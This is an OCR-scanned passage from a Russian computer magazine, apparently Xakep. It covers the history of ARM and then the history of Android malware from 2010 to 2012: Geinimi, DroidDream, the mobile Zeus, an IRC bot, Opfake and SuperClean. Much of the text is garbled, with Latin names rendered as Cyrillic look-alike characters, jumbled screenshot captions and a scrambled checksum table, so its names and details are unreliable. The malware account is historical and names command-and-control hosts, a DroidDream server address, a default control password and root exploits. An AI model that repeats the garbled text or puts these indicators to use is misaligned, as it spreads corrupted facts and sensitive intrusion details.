над чипом работает по сто человек, и все равно 
то и дело ошибки». Следом Уилсон отправился 
в американскую фирму ѴѴезіегп Резідп Сепіег, 
где увидел ровно противоположенную картину: 
процессоры разрабатывали небольшие группы 
инженеров, причем почти что в домашних усло- 



виях. Уилсон задался вопросом: а нужно ли по- 
купать чужой процессор, если можно сделать 
собственный? Пример Ѵ\Ю С показывал, что это 
не так сложно, как может показаться. 

Идею в Асогп приняли благосклонно, и рабо- 
та закипела. Уилсон придумал набор инструк- 
ций, а Фербер с небольшой командой разрабо- 
тал архитектуру будущего процессора. Именно 
тогда было принято судьбоносное решение ис- 
пользовать новомодный принцип ПІЗС. 

Первый в истории процессор АРМ (Асогп 
ПІЗС МасИіпе) был выпущен в 1985 году, но ком- 
пьютера на его основе так и не появилось. 
Его продавали в качестве дополнения к ВВС 
Мазіег — у этой продвинутой версии ВВС Місго 
был специальный интерфейс для подключения 
сопроцессоров. В комплект также входил набор 
для разработки программ для ПІЗС. 

Следующую инкарнацию процессора — 
АПМ2 ждала куда более интересная судьба: 
он лег в основу уникальной машины под назва- 
нием Агсііітесіез, впервые поступившей в про- 
дажу в 1987 году. АПМ2 имел 32-разрядную 
архитектуру, а адресная шина поддерживала 
26 разрядов, и таким образом могло быть адре- 
совано до 64 Мб оперативной памяти (огромное 
пространство по тем временам и несерьезное 
по нынешним). Частота АПМ2 сейчас тоже вряд 
ли кого-нибудь поразит, да и 1985 году 8 МГц 
можно было считать средним показателем. Вы- 
шедший примерно в то же время ІпіеІ 80368 ра- 
ботал на вдвое большей частоте, но это не зна- 
чит, что вдвое эффективнее. 386-й выдавал лишь 
на миллион операций больше — пять против че- 
тырех у АПМ2. Вот оно, преимущество ПІЗС! 

Агсііітесіез стоил приличных денег — 
от 800 фунтов стерлингов (с учетом инфляции 
и в пересчете на сегодняшние рубли получилось 
бы не меньше ста тысяч), но пользовался опре- 
деленной популярностью благодаря мощности, 
хорошему видеоадаптеру (режимы до 256 цве- 
тов) и восьмиканальной звуковой карте. По сути, 



это был этакий британский Масіпіюзіі — рабочая 
станция для издательств и телестудий. 

ИМПЕРИЯ ОЫѴЕТТІ 

Хоть Агсііітесіез и выпускался под маркой Асогп, 
компания к тому времени уже не была частным 
бизнесом Хаузера и Карри. За успешным 1983 
годом последовал ужасный 1984-й, когда ры- 
нок домашних компьютеров перенасытился. 
Это имело трагические последствия для многих 
игроков: Аіагі и Соттосіоге сменили хозяев, 
а в Арріе (в первый раз) столкнулись с перспек- 
тивой банкротства. 

В Асогп к этой альфа-версии краха доткомов 
тоже не были готовы: компания только-только 
вышла на биржу, и заработанных на этом денег 
стало достаточно, чтобы удовлетворить непре- 
рывно росший до того момента спрос. В резуль- 
тате на складах Асогп скопилось 250 тысяч ком- 
пьютеров, продать которые внезапно оказалось 
нереально. 

И тут на горизонте появилась итальянская 
фирма ОІіѵеНі. Ее руководство уже и раньше 
предпринимало попытки перейти от производ- 
ства пишущих машинок к компьютерам. С кон- 
вейеров ОІіѵеНі с 1983 по 1985 год сходили мо- 
дели на основе 2іІод 28000 и Іпіеі 8088. Но АРМ, 
Агсііітесіез и его операционная система ВІЗС ОЗ 
в глазах менеджеров ОІіѵеНі были лакомым ку- 
сочком. Иметь собственные технологии всегда 
лучше — по крайней мере в то время так каза- 
лось. 

Вскоре была заключена сделка, в результате 
которой к ОІіѵеНі перешло 80 процентов акций 
Асогп, а Герман Хаузер стал руководителем ис- 
следовательского подразделения. Второй ос- 
нователь Асогп Крис Карри, получив дивиденды 
от продажи, предпочел основать новую компа- 
нию — ОепегаІ ІпТогтаНоп Зузіетз. Она до сих 
пор функционирует и занимается смарт- 
картами, электронными денежными переводами 
и системами безопасности. 
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Штаб-квартира АНМ в Кембридже 



Схема одного из первых процессоров НІЗС 



Итальянцы, правда, тоже просчитались: 
в конце 80-х годов началось победное шествие 
ІВМ РС и его клонов. Стало понятно, что все не- 
совместимое с РС скоро окажется на свалке 
истории, и компании вместо того, чтобы взра- 
щивать свои технологии, массово переходили 
на сборку компьютеров из готовых компонентов. 
Тогдашние действия ОІіѵейі можно сравнить с НР, 
три года назад купившей Раіт, чтобы затем отка- 
заться от него и перейти на вездесущий АпсІгоісІ. 

Хаузер тоже не был горд тем, что продал свою 
компанию. В одном из интервью он сетует: мож- 
но было поступить, как ІВМ, — дать возможность 
сторонним фирмам производить компоненты 
и собирать компьютеры. И тогда, возможно, 
Асогп и АРМ, а не ІВМ и ІпіеІ оказались бы в цен- 
тре новой индустрии. Но нужное решение во- 
время принято не было, и стать британским ІВМ 
фирме Асогп было не суждено. Зато у Хаузера 
имелся запасной план. 

БРАТСТВО «ПРОЦА» 

То, что в ОІіѵеНі отказались от идеи развивать 
собственную компьютерную платформу, вовсе 
не означало погибель для АРМ. Хаузер изыскал 
способ выделить процессорный бизнес в отдель- 
ную компанию и нашел двух заинтересованных 
в этом партнеров. Объединенное предприятие 
назвали также, как и архитектуру процессора, — 
АРМ, но расшифровку сменили с Асогп РІЗС 
МасНіпез на АбѵапсесІ РІЗС МасЫпез. 

Кому в тот момент могло понадобиться пар- 
тнерство с разработчиком процессоров РІЗС? 
Очевидно, фирме, выпускающей устройства 
на их основе. Ей стала Арріе: там в 1990 году 
как раз проектировали будущий наладонник 
ІЧеѵѵІоп, и процессор АРМ отлично годился 
для него благодаря своей экономичности по от- 
ношению к заряду батареи. 

В качестве третьего партнера была выбрана 
фирма ѴІ_ЗІ ТесИпоІодіез. Это прямая наследни- 
ца ѴІ_ЗІ Ргоіесі:, которая занималась проектиро- 



ванием и производством интегральных микро- 
схем. Для будущего предприятия было важно то, 
что ѴІ_ЗІ могла предоставить собственную систе- 
му автоматизированного проектирования. 

Самой же ѴІ_ЗІ был нужен новый заказчик 
процессоров. Это в чистом виде воплощение 
идеи Конвея и Мида, когда разработчик и про- 
изводитель СБИС работают раздельно (а в дан- 
ном случае даже находятся по разные стороны 
Атлантического океана). Наученный неудачей 
Асогп, Хаузер внес еще одну коррективу: вместо 
того, чтобы выпускать сам продукт, он предло- 
жил заниматься исключительно проектировани- 
ем процессоров и продавать интеллектуальную 
собственность — то есть дизайны микросхем 
и лицензии на их производство. 

Если Іпіеі знаменита тем, что имеет десятки 
заводов по всему миру, то у АРМ нет ни одного. 
Это не помешало сегодняшней АРМ не только 
встать в один ряд с Іпіеі и АМЭ, но и потихоньку 
превратиться в серьезную угрозу для них. 

НОВАЯ ЖИЗНЬ АНМ 

Бурный рост продаж клонов ІВМ РС в 90-е годы 
сказался на популярности РІЗС не лучшим обра- 
зом. Там, где стали заправлять ІпѣеІ и МісгозоТІ:, 
альтернативы процессорам семейства х86 фак- 
тически не было. Зато оставались профессио- 
нальные применения: серверы и рабочие стан- 
ции ІВМ и Зип Місгозузіетз, где используются 
«рисковые» архитектуры РоѵѵегРС и ЗРАРС соот- 
ветственно, а также рынок микроконтроллеров, 
долго служивший для АРМ главной статьей до- 
хода. 

Первым процессором, дизайн которого вы- 
пустили в АРМ Ноісііпдз после отсоединения 
от Асогп, стал АРМ6, разработанный специаль- 
но для наладонника ІМеѵѵІюп и в сотрудничестве 
с Арріе. Впервые спецификация АРМ6 была вы- 
пущена в 1992 году, а в 1993-м компания объяви- 
ла о первых прибылях. 

С тех пор рост и совершенствование архи- 



тектуры АРМ не прекращались, а в 1998 году 
компания успешно вышла на биржу. Тогда же, 
кстати, Арріе продала свою часть акций: для нее 
это был год тяжелого кризиса, и отказ от доли 
в АРМ помог из него выбраться. Мог ли тогда 
Стив Джобс предположить, насколько важной 
для Арріе окажется продукция АРМ через десять 
лет? 

Среди клиентов АРМ на сегодняшний день 
числится больше четырех десятков крупных про- 
изводителей электроники. Процессоры на ос- 
нове дизайнов АРМ можно обнаружить в самых 
разных устройствах — от жестких дисков до ав- 
томобилей и от игровых приставок до фото- и ви- 
деокамер и телевизоров. Даже в ІпіеІ одно время 
выпускали процессоры на основе АРМ (серия 
называлась ХЗсаІе, но в 2006 году была продана 
вместе с подразделением). 

Однако самую большую славу АРМ принесло 
развитие мобильных устройств. Арріе Ыеѵѵіюп 
и наладонники Роскеі: РС были лишь предисло- 
вием к тому, что случилось после выпуска іРНопе 
в 2007 году и іРасІ — в 2010-м. Энергоемкость 
архитектуры РІЗС оказалась ключом к строению 
портативных устройств, и, сколько ІпіеІ ни пы- 
тается соревноваться с АРМ на этом попри- 
ще, сделать конкурентоспособный процессор 
для планшетов и смартфонов на основе х86 пока 
что не удалось. 

Благодаря АРМ архитектура РІЗС наконец 
получила заслуженную славу, но на этом история 
вовсе не заканчивается. Специалисты с интере- 
сом следят за ростом популярности многопро- 
цессорных серверных решений на основе АРМ 
(их, к примеру, активно внедряют в дата-центрах 
РасеЬоок) и обсуждают недавнее появление 
64-разрядного АРМѵ8. Так что будущее АРМ 
видится даже более захватывающим, чем про- 
шлое. Пока что это еще не «британский ІВМ», 
о котором так мечтал Хаузер, но процветающая 
фирма, вполне себе бодро идущая к этому зва- 
нию. ІНІ 
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На пороге пандемии 



НА ПОРОГЕ 
ПАНДЕМИИ 

История мобильного вирусописательства на примере АпйгоіЛ 

Первый экспериментальный образец полноценного трояна для АпсІгоісІ был представлен летом 
2010 года на конференции РЕР СОМ 18. С тех пор прошло уже три года, и за это время количе- 
ство вирусов для мобильной ОС от Соодіе выросло в тысячи раз, а Соодіе успела придумать 
десятки различных методов противостояния угрозам. В этой статье мы детально исследуем 
мир вредоносов для АпсІгоісІ и проследим противостояние поискового гиганта и хакеров. 



ДО НАШЕЙ ЭРЫ, ИЛИ КАК НАПИСАТЬ ВИРУС 
ЗА 15 МИНУТ 

Первые попытки создать вредоносный софт для АпсІгоісІ и до- 
казать несостоятельность гугловской мобильной платформы 
с точки зрения безопасности начались с публикации первых 
предварительных версий АпсІгоісІ ЗЭК в 2007 году. Молодые 
студенты писали софт, который использовал стандартную 
функциональность смартфона для чтения ЗМЗ’ок, а «исследо- 
вательские» команды, вроде ВІИ :г Рогсе Маззасіа, демонстри- 
ровали аж «30 векторов атак на АпсІгоісІ», показывая, как можно 
использовать стандартные АРІ АпсІгоісІ во вредоносных целях. 

Это было время игрушек, которые нельзя было назвать 
ни настоящим вредоносным ПО, ни тем более вирусами. То тут, 
то там появлялись приложения, вроде МоЬіІе Зру от Пейпа-Х 
ЗШсІіоз, которые позволяли удаленно читать текстовые сооб- 
щения, историю звонков, просматривать фотографии, видео, 
определять координаты смартфона. Встречались и различные 
поддельные приложения, такие как обнаруженный в маркете 
в январе 2010 года неофициальный клиент для различных бан- 
ков, который ни с чем не соединялся, а просто уводил номера 
кредитных карт, введенных самим пользователем. 

Более-менее настоящий троян был реализован только 
в 2010 году секьюрити -компанией Тгизілл/аѵе, которая про- 
демонстрировала его на конференции ЭЕР СОІМ 18. Впрочем, 
Америки они не открыли; троян был всего лишь стандартным 
модулем ядра І_іпих, который перехватывал системные вызовы 
мгі-Ье(), геасІ(), ореп() и с1озе(), а также создавал реверсив- 
ный шелл по звонку с определенного номера. Вся эта функ- 
циональность позволяла подключиться к смартфону удаленно 
и скрытно использовать его возможности в своих целях, в том 
числе читать конфиденциальную информацию. 

Для установки руткита требовался физический доступ 
к устройству, гооі:- права и смартфон НТО І_едепсІ (модуль был 
совместим только с его ядром), поэтому ни о каком практиче- 
ском применении руткита речи не шло. РгооТ оТ сопсері:, кото- 
рый доказал только то, что ядро І_іпих и в смартфоне остается 
ядром І_іпих. 

Настоящий троян «в дикой природе» (не в маркете) был най- 
ден только в августе 2010 года. Правда, это был совсем не тот 
тип трояна, о котором принято писать в нашем журнале, а всего 
лишь ЗМЗ-троян, то есть, по сути, обычное приложение, кото- 
рое шлет ЗМ8 на платные номера без ведома юзера. Игрушка, 
которую хороший программист напишет за полчаса, но очень 
опасная, попади она к обычному юзеру. 

Троян, получивший имя Тгоіап-ЗМЗ.АпсІгоісІОЗ.РакеРІауег.а, 
прикидывался видеоплеером под незамысловатым назва- 
нием Моѵіе РІауег и с иконкой стандартного проигрывателя 
из ѴѴіпсІоѵѵз. Приложение требовало права доступа к карте па- 



мяти, отправке ЗМЗ и получению данных о смартфоне, о чем 
система сообщала перед его установкой. Если все это не сму- 
щало пользователя и он соглашался с установкой и запускал 
приложение, оно повисало в фоне и начинало отправку ЗМЗ 
на номера 3353 и 3354, каждая из которых обходилась в пять 
долларов. Номера эти, кстати, действовали только на террито- 
рии России, так что нетрудно догадаться о корнях автора данно- 
го «произведения». 

В октябре был обнаружен другой тип ЗМЗ-трояна. На этот 
раз зловред использовал смартфон не для опустошения ко- 
шелька жертвы, а для кражи его конфиденциальных данных. 
После установки и запуска троян уходил в фон и пересылал 
все входящие ЗМЗ на другой номер. В результате злоумыш- 
ленник мог не только завладеть различной конфиденциальной 
информацией пользователя, но и обойти системы двухэтапной 
аутентификации, которые для входа требуют не только логин 
и пароль, но и одноразовый код, отправляемый на номер мо- 
бильного телефона. 

Интересно, что номер телефона злоумышленника не был 
жестко вбит в код трояна, а конфигурировался удаленно. Чтобы 
его изменить, требовалось отправить на номер жертвы особым 
образом оформленную ЗМЗ, которая содержала номер теле- 
фона и пароль. Пароль можно было изменить с помощью дру- 
гой ЗМЗ, по умолчанию использовалась комбинация гесІ4ІіТе. 

СЕШІМІ И ВСЕ-ВСЕ-ВСЕ 

Первый по-настоящему профессионально написанный и об- 
ладающий защитой от анализа вредонос для АпсІгоісІ был об- 
наружен только в декабре 2010 года компанией І_оокоиІ. Тро- 
ян, получивший имя Сеіпіті, качественно отличался от всего, 
что было написано ранее, и обладал следующими уникальными 
характеристиками: 

• Распространение в составе легитимного ПО. В отличие 
от всех остальных зловредов, которые только прикидыва- 
лись настоящими программами и играми, Сеіпіті на са- 
мом деле внедрялся в реально существующие игры. В раз- 
ное время троян был найден в составе таких приложений, 
как Мопкеу Зитр 2, Ргезісіепі: Ѵегзиз АІіепз, Сйу ЭеТепзе апсі 
ВазеЬаІІ Зирегзіагз 2010, разбросанных по местным марке- 
там Китая и различным іоггепі-трекерам. Функциональность 
оригинального приложения полностью сохранялась, поэто- 
му пользователь даже не догадывался о заражении смарт- 
фона. 

• Двойная защита от анализа. Код трояна был пропущен че- 
рез обфускатор, что затрудняло его анализ, а все комму- 
никации с удаленным сервером шифровались (справед- 
ливости ради стоит сказать, что использовался ущербный 
алгоритм ЭЕЗ с ключом 12345678). 




Евгений Зобнин 

ехесЬііги 
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СІеапир сіопе! 

Резіапесі ГоІІоѵѵіп§ арр$: 
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сот.§оо§Іе.апс1гоі<іарр$.тар5: 

Ме(ѵѵогкІосаііоп$егѵісе 

сот.ктз 
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сот.кШірсІ 
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СІозе 



Так выглядел интерфейс первой обнаруженной 
версии 2еи8 



Атак выглядела версия, обнаруженная спустя десять Все, что выводит Вирегсіеап на экран 

месяцев 




ОТО 

В качестве одного 
из методов полимор- 
физма в найденном 
Зутапіес трояне 
использовалась 
включаемая в разные 
файлы фотография 
того самого Свидете- 
ля из Фрязино. 



• Возможность использования для организации ботнета. 
В коде Сеіпіплі было найдено более 20 управляющих команд, 
которые позволяли выполнять такие операции, как установ- 
ка и удаление приложений (правда, на это требовалось раз- 
решение пользователя), получение списка всех установлен- 
ных программ или запуск приложений. 

В целом Сеіпіті действовал по следующему алгоритму. 
После запуска зараженного приложения создавался фоновый 
сервис, который собирал персональные данные: координаты 
устройства, номера ІМЕІ и ІМЗІ. Затем с интервалом в одну ми- 
нуту он пытался связаться с одним из десяти удаленных сер- 
веров (\ллллл/.\л/ісІіТи.сот, \ллллл/.исІаоге.сопл, \ллллл/.ТгусІ.сопп и дру- 
гими), куда передавалась вся собранная информация и где 
собирались команды для удаленного исполнения. 

Сеіпіті стал родоначальником полнофункциональных троя- 
нов для АпбгоісІ, и после его первого обнаружения на просторах 
интернета стали все чаще появляться зловреды с аналогичной 
или похожей функциональностью. Вскоре была найдена мо- 
дификация Сеіпіті под названием АОРЮ, троян АпбгоісЩаррз 
и множество других. Все они распространялись через различ- 
ные сайты, Іоггепі-трекеры, китайские неофициальные мага- 
зины, поэтому защититься от них можно было, просто не уста- 
навливая приложения из неизвестных источников. Однако все 
изменилось, когда был обнаружен троян ОгоісЮгеат, распро- 
странявшийся в составе более чем 50 приложений, опублико- 
ванных в официальном АпбгоісІ МагкеЕ 

БВОІОБКЕАМ И НАЧАЛО БОРЬБЫ ЗАЧИСТОТУ 
МАРКЕТА 

В марте 2011 года пользователь І_отроІо сообщил на гебсііі:, 
что в маркете АпбгоісІ обнаружено нескольких десятков вре- 
доносных приложений, опубликованных человеком с ником 



Сеіпіті стал родоначальником полнофунк- 
циональных троянов дляАпдгоШ, и после 
его обнаружения стали появляться зло- 
вреды с аналогичной функциональностью 



МуоигпеЕ Несмотря на заурядность самого трояна, а также 
уже известный способ распространения, основанный на вне- 
дрении кода в легитимное приложение, факт наличия малвари 
в маркете, а также предположения о том, что она использует 
эксплойт гадеадаіпзйііесаде для получения прав гооі: на устрой- 
стве, быстро подогрели интерес к новости пользователей и со- 
трудников различных секьюрити-компаний. За несколько дней 
начальный список из двух десятков приложений расширился 
до 56, а среди публиковавших его людей (или ботов, кто знает) 
обнаружились КіпдплаІІ2010 и ѵѵе20090202. 

Сам по себе ОгоісЮгеат по функциональности был очень 
похож на упрощенный Сеіпіті, но не был его вариацией. Он так- 
же собирал информацию о смартфоне, отправлял ее на удален- 
ный сервер (НПр://1 84. 105.245. 17:8080/СМ8егѵег/ѲМ8егѵІе1:) 
и получал в ответ управляющие команды. Плюс ко всему он так- 
же содержал в себе другое приложение, спрятанное в каталоге 
аззеіз/здІііе.сІЬ внутри АРК и устанавливаемое в систему под 
именем ОоѵѵпІоабРгоѵісІегзМападег.арк. Очевидно, это была за- 
щита от удаления. 

В сумме зараженные приложения успели установить от 50 
до 200 тысяч пользователей, пока команда безопасности 
Соодіе не отреагировала на сообщение и не удалила из мар- 
кета все найденные копии зловреда и аккаунты выложивших 
их пользователей. В дополнение в маркете также появилось 
приложение АпбгоісІ Магкеі: Зесигііу ТооІ, с помощью которо- 
го пользователь мог очистить смартфон от заразы. Но и здесь 
не обошлось без конфуза. Буквально через два дня после это- 
го Зутап1:ес обнаружила на просторах интернета зараженную 
версию этого приложения, которая содержала в себе уже дру- 
гой троян, названный впоследствии Раке10086 за выборочную 
блокировку ЗМЗ с номера 10086. 

Факт проникновения малвари в АпбгоісІ Магкеі: (а после 
ОгоісЮгеат в маркете было обнаружено еще несколько ви- 
русов) заставил Соодіе серьезно задуматься над безопас- 
ностью своего репозитория приложений, а так как вручную 
они ничего делать не привыкли, то в результате в начале 2012 
года выкатили сервис Воипсег, который проверял приложения 
на безопасность с помощью запуска в виртуальной машине. 
Задача Воипсег состояла в том, чтобы производить много- 
кратный запуск софтины, симулировать работу реального 
пользователя с приложением и анализировать состояние си- 
стемы до и после работы с приложением. Если никаких стран- 
ных и подозрительных действий софтина себе не позволяла, 
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Конец 2011 года: на- 
чало стремительного 
роста количества виру ■ 
сов для АпсІгоісІ 



то она пропускалась в маркет, в противном случае публикация 
блокировалась. 

Если верить Соодіе, то сразу после запуска Воипсег со- 
кратил количество вредоносов в маркете на 40% (как они это 
подсчитали, остается загадкой). Однако позднее выяснилось, 
что его можно легко обойти, просто проанализировав некото- 
рые характеристики системы, такие как етаіі-адрес владельца 
«смартфона», версию ОС и так далее, а затем создав прило- 
жение, которое при их обнаружении будет действовать абсо- 
лютно законно и делать грязную работу только на настоящем 
смартфоне. Скорее всего, Соодіе уже разработала схему про- 
тиводействия обнаружению Воипсег (например, с помощью 
генерации уникальных виртуальных окружений для каждого 
приложения). 

2ЕІІ8-Ш-ТНЕ-МОВИЕ 

Пять лет назад по компам пользователей начал свое победо- 
носное шествие троян под названием 2еиз. Благодаря изо- 
щренному дизайну и продвинутым техникам маскировки, де- 
лавшим его обнаружение невероятно трудной задачей, он смог 
распространиться на миллионы машин по всему миру и создать 
один из самых крупных ботнетов в истории; только в США было 
зафиксировано более трех с половиной миллионов случаев за- 
ражения. 

Основная задача 2еиз состояла в организации атаки типа 
плап-іп-ІІіе-Ьгоѵѵзег, то есть использования техник кейлоггин- 
га и формграббинга для перехвата частной пользовательской 
информации и ее отправки на удаленные серверы. За время 
своей работы 2еиз смог утащить сотни тысяч логинов и паро- 
лей от популярных сервисов (РасеЬоок, Уаііоо!, НІ5, теігоРЮС, 
Зопісо, ІМеИод) и, конечно же, множества онлайн-банков. 

Разработчик 2еиз быстро отреагировал на появление си- 
стем двухфакторной аутентификации и в 2010 году выпустил 
для ЗутЬіап и ВІаскВеггу приложения, задача которых состояла 
в перехвате аутентификационных ЗМЗ-сообщений с одноразо- 
выми кодами авторизации и их последующей отправке на все 
те же удаленные серверы. В середине 2012 года аналогичное 
приложение появилось и для АпсІгоісІ. 

Первая его версия была очень примитивна и представляла 
собой якобы секьюрити-приложение, которое при запуске вы- 
водит код верификации и закрывается. В результате в фоне 
повисает сервисный процесс, который занимается перехватом 
8М8 и их отправкой на удаленный сервер. Последующие вер- 



сии 2еиз для АпсІгоісІ обзавелись также системой удаленного 
управления с помощью сообщений с определенного номера, 
однако никаких продвинутых приемов маскировки или распро- 
странения вирус не использовал и в этот раз. 

Тем не менее мобильная версия 2еиз все-таки смогла наде- 
лать много шума в СМИ, но, как можно видеть, троян был силь- 
но переоценен. 

ПЕРВЫЙ ШС-БОТ 

В середине января 2012 года сотрудники «Лаборатории Ка- 
сперского» сообщили, что обнаружен первый в истории АпсІгоісІ 
ІВС-бот. Приложение распространялось в виде установочно- 
го АРК-файла размером чуть больше 5 Мб и выдавало себя 
за игру Мабсіеп І\ІРІ_ 12. Интересное отличие этого трояна 
от других было в том, что, по сути, вся его логика работы заклю- 
чалась в нативных приложениях І_іпих, которые никак не свети- 
лись в окне стандартного диспетчера задач АпсІгоісІ и к тому же 

использовали локальный эксплойт для получения прав юоХ. Страница приложения 

Во время запуска приложение создавало каталог /сіаііа/ Зирегсіеап. Обрати 
сіаііа/сот . апсі гоісі . Ьо1:/Я1е5 , в котором размещало три фай- внимание на рейтинг 
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6 феврале 2 ои года 
компания Зутапіес 
сообщила, что об- 
наружила первый 
полиморфный тро- 
ян для платформы 
Апйгоій 







Рііе СИС 




ІпзіаІІег.АРК 


5КАСНАТ.АРК 




9СІС48161 


074с 54Ь5 


МЕТА-ІМР/МАІМІРЕ5Т.МР 


Ы377893 


42есЬ534 


МЕТА-ІМР/АІ.АРМ.5Р 


248С37Г7 


65105Ь65 


МЕТА-МР/АІ-АРМ.РЗА 


40659Ь25 


40659Ь25 


АпсІгоісІМапіІезі.хтІ 


ЬЬсІ88с2сІ 


ЬЬсі88с2сі 


гезоигсез.агзс 


7а3498с4 


7а3498с4 


сіаззез.сіех 


6129Т361 


9е488е9е 


гез/гаѵѵ/сІаіа.сІЬ 


27Ьс873сІ 


27Ьс873сІ 


гез/сігаѵѵаЫе-Мрі/Іодо.рпд 


27Ьс873сІ 


27Ьс873сІ 


гез/сІгаѵѵаЫе-ІсІрі/Іодо.рпд 


27Ьс873сІ 


27Ьс873с1 


гез/сІгаѵѵаЫе-тсІрі/Іодо.рпд 


Та11ЬесІ8 


Ш1ЬесІ8 


гез/сІгаѵѵаЫе-Мрі/ісоп.рпд 


1а11Ьесі8 


1а11ЬесІ8 


гез/сІгаѵѵаЫе-ІсІрі/ісоп.рпд 


ТаІІЬесШ 


1а11ЬесІ8 


гез/сІгаѵѵаЫе-тсІрі/ісоп.рпд 





^ '3' а т 18:17 

сот.апсігоісі.вузіепп.асі... 



Оо уои ѵѵап* Іо іпзіаіі іЬіз арріісаііоп? 

Аііоѵѵ іЬіз аррІісаЛоп Іо: 

• Ѵоиг теззадез 

ест ЗМЗ ог ММ3, геасі ЗМЗ ог ММ3, 
гесеіѵе ЗМЗ 

• ІЧеІѵѵогк соттипісаііоп 

сгеаіе ВІиеІооіЬ соппесііопз, ІиІІ 
Іпіетеі ассезз 

• Ѵоиг регзопаі іпіогтаііоп 

геасі сопіасі сіаіа, геасі зепзіііѵе Іод 
сіаіа 

• Зіогаде 

тосІИу/сІеІеІе 50 сагсі сопіепіз 

• РЬопе саііз 

іпіегсері оиідоіпд саііз, геасі рЬопе 
зіаіе апсі ісіепіііу 

• Зегѵісез іЬаІ созі уои топеу 

сіігесііу саіі рЬопе питЬегз, зепсі 
ЗМЗ теззадез 

• Зузіет Іооіз 

СапсеІ ІпзІаІІ 



4> •> ѲП Ш 18:18 

^ Асііѵаіе сіеѵісе асітіпізігаіог? 

1, 

^ Зузіет 

АМепІіоп! Т о іпзіаіі іЬе арріісаііоп, уои 
пеесі (о асітіп ассезз! 

Асііѵаііпд іЬіз асітітзігаіог ѵѵііі аііоѵѵ іЬе арр 
сот.апсігоісі.зузіет.асітіп іо регіогт ІЬе 
(оІІоѵѵіпд орегаііопз: 

• 1_оск ІЬе зсгееп 

Сопігоі ѵѵЬеп уоиг сіеѵісе Іоскз, гедиігіпд 
іЬаі уои ге-епіег уоиг раззілюгсі. 



СапсеІ Асііѵаіе 



Различия в контрольных суммах файлов пакета Васксіоог. АпсІгоісЮЗ . ОЬасІ . а требует множество А плюс ко всему еще и запрашивает права админи- 

с трояном, скачанных в разное время полномочий для работы стратора 



ла: ЬеабегОІ .рпд, ТооІегОІ .рпд, ЬогсІегОІ .рпд, а затем ставило 
на них бит исполнения и запускало первый файл — эксплойт 
СіпдегЬгеак для получения прав гооі: на устройстве. Если была 
установлена уже рутованная прошивка, приложение пыталось 
получить права гооі: штатными средствами, в результате чего 
у пользователя запрашивалось предоставление повышенных 
привилегий (тот случай, когда рутованный смартфон безопас- 
нее залоченного). 

В случае успешного получения прав гооі: любым из двух 
способов запускался второй файл, в котором хранился 8М8- 
троян — модификация известного трояна Ропсу ЗМЗ. Троян 
определял принадлежность ЗІМ-карты стране и начинал от- 
правку сообщений на короткий платный номер, блокируя все 
ответные сообщения. Следующим запускался файл ЬогсІегОІ. 
рпд, в котором был код ІВС-бота. Он подключался к ІРІС-серверу 
с ІР-адресом 199.68.*.* и регистрировался на канале #апсІгоз 
под случайным ником. Все сообщения, отправленные боту, вы- 
полнялись в консоли как обычные Ыпих-команды. 

Согласно заявлению сотрудников «Лаборатории Касперско- 
го», это было первое приложение такого класса для АпсІгоісІ. Од- 
нако, по их мнению, опасность его была невелика, так как рас- 
пространялся он только через серые маркеты, а эксплойт 
работал только в ранних версиях АпсІгоісІ 2.3. 

ПЕРВЫЙ ПОЛИМОРФНЫЙ ТРОЯН 

В феврале 2012-го компания Зутапіес сообщила, что обна- 
ружила первый полиморфный троян для платформы АпсІгоісІ, 
который на тот момент не мог быть найден ни одним мобиль- 
ным антивирусом, кроме ее собственного (сюрприз). Троян, 
названный АпсІгоісІ. Ор^аке, распространялся через различные 
веб-сайты, находившиеся преимущественно на территории 
России и стран СНГ, в виде бесплатной версии популярного 
приложения или игры. 

Полиморфным он был только условно, так как изменение 
трояна происходило на стороне сервера. При каждой новой за- 
грузке файла содержимое АРК-файла изменялось с помощью 
различных методов, таких как модификация файлов данных, 
включение в пакет приложения «мусорных файлов», а также 



изменение имен файлов. Все это затрудняло обнаружение 
мобильными антивирусами, которые в то время использовали 
примитивные техники идентификации, типа сверки контроль- 
ных сумм и проверки на наличие специфических файлов в па- 
кете. 

После попадания на смартфон жертвы и запуска троян 
извлекал из файла гез/гам/сіаііа.сіь (который существовал 
в любой версии трояна) список операторов связи и платных 
коротких номеров и начинал отправку ЗМЗ. В дополнение тро- 
ян открывал в браузере веб-страницу, содержащую ссылки 
на другое вредоносное ПО. Интересно, что сообщения также 
изменялись при каждой новой мутации трояна, в результате 
чего было невозможно блокировать определенные типы со- 
общений на стороне оператора. 

ВИРУС-МАТРЕШКА 

Неделей раньше, а именно 1 февраля 2012 года на сайте 
зесигеіізі.сот Виктор Чебушев опубликовал заметку, посвя- 
щенную обнаружению нового типа вируса, распространяемого 
через магазин Соодіе РІау. Вирус маскировался под приложе- 
ние Зирегсіеап, способное, по словам разработчиков, очистить 
память устройства и таким образом поднять производитель- 
ность смартфона или планшета. На тот момент приложение 
имело уже от 1000 до 5000 установок и хороший рейтинг в 4,5 
звезды. 

Как выяснилось, Зирегсіеап действительно выполнял очист- 
ку памяти, но делал это простым перезапуском всех фоновых 
приложений с помощью всего пяти строк на языке Оаѵа. На этой 
«сложной» задаче полезное действие приложения заканчива- 
лось, а самое интересное начиналось дальше. Анализируя код, 
сотрудник «Лаборатории Касперского» обнаружил, что при за- 
пуске приложение соединялось с удаленным сервером и за- 
гружало на карту памяти три файла: аиіогип.іпТ, Тоісіег.ісо 
и зѵсііозіз.ехе. 

Первые два автоматически превращали подключаемый 
к ІІЗВ-порту компа смартфон в самозагружаемую флешку, с ко- 
торой запускался файл зѵсііозіз.ехе. Сам зѵсііозіз.ехе на по- 
верку оказался бэкдором ВасксІоог.МЗІІ_.5зисІ.а, который слу- 
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шает микрофон компьютера и отправляет все полученные с его 
помощью данные на удаленный сервер. 

Отличительной чертой трояна был также самый внушитель- 
ный на тот момент набор функциональности из всех мобильных 
зловредов для АпсІгоісІ. По команде от оператора он мог от- 
правлять сообщения без ведома пользователя, включать и вы- 
ключать ѴѴі-Рі, собирать информацию об устройстве, открывать 
произвольные ссылки в браузере, отправлять на удаленный 
сервер содержимое 50-карты, ЗМЗ-переписку и выполнять 
многие другие операции. 

ОЧЕРЕДНОЙ ОТВЕТ СООСІ.Е, ИЛИ ПРИНУДИТЕЛЬНАЯ 
ПРОВЕРКА ВСЕХ ПРИЛОЖЕНИЙ 

К концу 2012 года ситуация с зловредами для АпсІгоісІ стала 
уже настолько накаленной, что Соодіе решила пойти на оче- 
редной кардинальный шаг. В сентябре без лишней огласки был 
приобретен сервис онлайн-проверки приложений на вирусы 
ѴігизТоІаІ, а 29 октября выпущена версия АпсІгоісІ 4.2, одним 
